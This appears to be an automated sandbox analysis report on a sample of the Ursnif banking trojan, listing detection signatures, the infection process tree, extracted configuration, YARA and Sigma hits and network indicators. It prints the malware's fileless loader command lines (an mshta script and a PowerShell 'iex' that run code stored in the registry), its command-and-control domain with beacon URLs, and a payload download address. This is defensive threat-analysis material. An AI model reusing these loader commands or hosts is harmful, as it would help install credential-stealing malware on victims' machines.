Play interactive tour

Edit tour

Analysis Report 5fd9d7ec9e7aetar.dll

Overview

General Information

Sample Name:	5fd9d7ec9e7aetar.dll
Analysis ID:	331120
MD5:	7d675f9a252b26cd655607ae8b36c3e9
SHA1:	522894a5e30417192c053579d583ff7a690316a7
SHA256:	5e7f200f26fb2fc09ca80862fc6bec38f7d539aada080af6461771f9233c054f
Tags:	brtdllgoziisfbursnif
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a COM Internet Explorer object

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Found Tor onion address

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to get notified if a device is plugged in / out

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 5508 cmdline: loaddll32.exe 'C:\Users\user\Desktop\5fd9d7ec9e7aetar.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)

control.exe (PID: 5128 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

iexplore.exe (PID: 6276 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6324 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6276 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 3880 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 2588 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 4380 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17418 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6308 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17428 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 5092 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 6620 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 1700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 6180 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 1396 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9CA2.tmp' 'c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 5044 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 5136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESABD5.tmp' 'c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@320946hh", "dns": "320946", "version": "250167", "uptime": "175", "crc": "2", "id": "4343", "user": "c2868f8f08f8d2d8cdc8873aab08ddd5", "soft": "3"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000026.00000003.445671426.0000026AEDB20000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 6620	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 5508	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: control.exe PID: 5128	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: explorer.exe PID: 3472	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 15 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6620, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', ProcessId: 6180

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5092, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ProcessId: 6620

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6620, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline', ProcessId: 6180

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: loaddll32.exe.5508.0.memstr

Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@320946hh", "dns": "320946", "version": "250167", "uptime": "175", "crc": "2", "id": "4343", "user": "c2868f8f08f8d2d8cdc8873aab08ddd5", "soft": "3"}

Multi AV Scanner detection for domain / URL

Show sources

Source: rosadalking.xyz

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: 5fd9d7ec9e7aetar.dll	Virustotal: Detection: 12%			Perma Link
Source: 5fd9d7ec9e7aetar.dll	ReversingLabs: Detection: 10%

Source: 0.2.loaddll32.exe.1500000.1.unpack

Avira: Label: TR/Crypt.XPACK.Gen8

Source: C:\Windows\explorer.exe

Code function: 37_2_03B7174C RegisterDeviceNotificationA,

37_2_03B7174C

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02F632BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	0_2_02F632BA
Source: C:\Windows\explorer.exe	Code function: 37_2_03B70180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,	37_2_03B70180
Source: C:\Windows\explorer.exe	Code function: 37_2_03B60C34 FindFirstFileW,	37_2_03B60C34
Source: C:\Windows\explorer.exe	Code function: 37_2_03B5A85C FindFirstFileW,DeleteFileW,FindNextFileW,	37_2_03B5A85C

Networking:

Creates a COM Internet Explorer object

Show sources

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

Found Tor onion address

Show sources

Source: powershell.exe, 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000026.00000002.458481553.00000000009D6000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1&dns=%s&whoami=%sMozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s); Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

Source: Joe Sandbox View

IP Address: 216.58.210.2 216.58.210.2

Source: Joe Sandbox View	JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: Joe Sandbox View	JA3 fingerprint: 7dd50e112cd23734a310b90f6f44a7cd

Source: unknown	TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown	TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown	TCP traffic detected without corresponding DNS query: 89.44.9.160
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54
Source: unknown	TCP traffic detected without corresponding DNS query: 185.156.172.54

Source: global traffic	HTTP traffic detected: GET /images/PyPG1445hl/46EQl_2BHA_2B7TdC/2kCm72bEjNb0/BR1CjGRrQcU/b_2BmaLHUOoKmw/xeggxPGc7nfKRGZxkwY7m/6XO3LRBusWZ68b2Q/9CuG_2BFhJPugx2/mLb9eBF61d6PEdK9bs/54NcT0amJ/cPoLRcNqBcfX0RKHxYZO/vGw1uksCwbrdZy38AcM/QknS0Ofxufsp/AGlpBU.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: rosadalking.xyzConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rosadalking.xyzConnection: Keep-AliveCookie: PHPSESSID=ioak1ilk7vhlu36vv01oie9fv7; lang=en
Source: global traffic	HTTP traffic detected: GET /images/3U_2B2PC7eNms4Rfw/m2bayU1bYGRN/mfyZR8juil8/5WDNQcansH_2FP/bNCVxlxtGYDsy5Ztqa5MO/ZE1uNeIragrUuVu9/t1VvHxGOnUeE0N9/AofD3_2FkZDH3xF9WG/e6QRtMJki/mDfRsmXPGHOJcDq1VRhX/EAwOOQEOyOVMOCO4aMJ/IIjWmZnO6yO6LwKDQCAmcr/fLzp.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: rosadalking.xyzConnection: Keep-AliveCookie: lang=en
Source: global traffic	HTTP traffic detected: GET /images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8cRjS9_2B9CFok/IIciaBbavff8xIv/QDnJnQxg5GFZWds3Q4/WJYPPBvIM/fTQamjd1C8ZF4x_2BQAG/7tjeWUw0l7HYY5PaqB5/4nRQ7JoUoZ1VN0XTFxi7Cj/sa195v8n0NrfN/CyTgvxQv/A6Pn.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: rosadalking.xyzConnection: Keep-AliveCookie: lang=en

Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa069a141,0x01d6d3de</date><accdate>0xa069a141,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa069a141,0x01d6d3de</date><accdate>0xa069a141,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: rosadalking.xyz

Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp	String found in binary or memory: http://89.44.9.160/gr32.rar
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp	String found in binary or memory: http://89.44.9.160/gr32.rarB
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp	String found in binary or memory: http://89.44.9.160/gr32.rarb
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.450828486.00000000066A0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000025.00000000.451438458.0000000006793000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
